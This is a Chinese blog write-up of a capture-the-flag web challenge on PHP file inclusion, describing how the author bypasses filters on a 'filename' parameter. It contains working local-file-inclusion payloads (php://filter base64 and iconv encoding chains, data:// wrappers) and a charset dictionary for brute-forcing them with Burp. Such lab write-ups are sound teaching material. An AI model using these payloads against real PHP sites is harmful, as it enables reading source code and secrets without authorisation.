109,【1】攻防世界 web 题目名称-文件包含

进入靶场

直接显示源代码

提示我们通过get方式传递名为filename的参数,同时给出了文件名check.php

filename=check.php

显示使用了正确的用法,错误的方法

filename=./check.php

还是一样的回显

傻了,题目名称是文件包含,需要用到函数

文件包含漏洞-CSDN博客

先试试最常用到的这个

php://filter/read=convert.base64-encode/resource=flag.php

被过滤了

换一个伪协议

data://text/plain,123456

话是这么说,但没显示123456说明data协议不行

间接提示了php伪协议换个过滤器说不定可以

php://filter/read=convert.base64-encode/resource=flag.php

之前用的是上面这个,一个个尝试看看被过滤的是哪些

read和base编码被禁了

不使用read的话还有string开头的过滤器

string也被过滤了

试试下面这个

php://filter/convert.iconv.utf-8/gbk/resource=flag.php
作用是将文本从 UTF - 8 编码转换为 GBK 编码

这个编码转换不行,但有很多编码供我们尝试

使用bp去爆破

字典如下

UCS-4*

UCS-4BE

UCS-4LE*

UCS-2

UCS-2BE

UCS-2LE

UTF-32*

UTF-32BE*

UTF-32LE*

UTF-16*

UTF-16BE*

UTF-16LE*

UTF-7

UTF7-IMAP

UTF-8*

ASCII*

发现有两种组合都能得到flag

相关推荐
xiejava10185 小时前
开源安全管理平台wazuh-非法可疑进程检测
安全·开源·wazuh
你的电影很有趣8 小时前
lesson72:Node.js 安全实战:Crypto-Js 4.2.0 与 Express 加密体系构建指南
javascript·安全·node.js
Giser探索家9 小时前
遥感卫星升轨 / 降轨技术解析:对图像光照、对比度的影响及工程化应用
大数据·人工智能·算法·安全·计算机视觉·分类
全栈工程师修炼日记9 小时前
ARMv8系统的安全性(二):TrustZone架构如何重塑移动设备安全生态
安全
嗨丶王哪跑10 小时前
网络安全主动防御技术与应用
运维·网络·安全·web安全
火白学安全14 小时前
《Python红队攻防脚本零基础编写:入门篇(一)》
python·安全·web安全·网络安全·系统安全
携欢14 小时前
PortSwigger靶场之Exploiting server-side parameter pollution in a REST URL通关秘籍
前端·javascript·安全
好家伙VCC14 小时前
**发散创新:渗透测试方法的深度探索与实践**随着网络安全形势日益严峻,渗透测试作为评估系统安全的
java·python·安全·web安全·系统安全
人邮异步社区15 小时前
内网攻防实战图谱:从红队视角构建安全对抗体系
网络·安全·web安全
胡耀超16 小时前
大数据平台安全指南——大数据平台安全架构全景:从认证授权到数据治理的企业级实践指南——认证、授权、审计、加密四大支柱
安全·数据治理·数据安全·权限管理·安全架构·hadoop生态·合规审计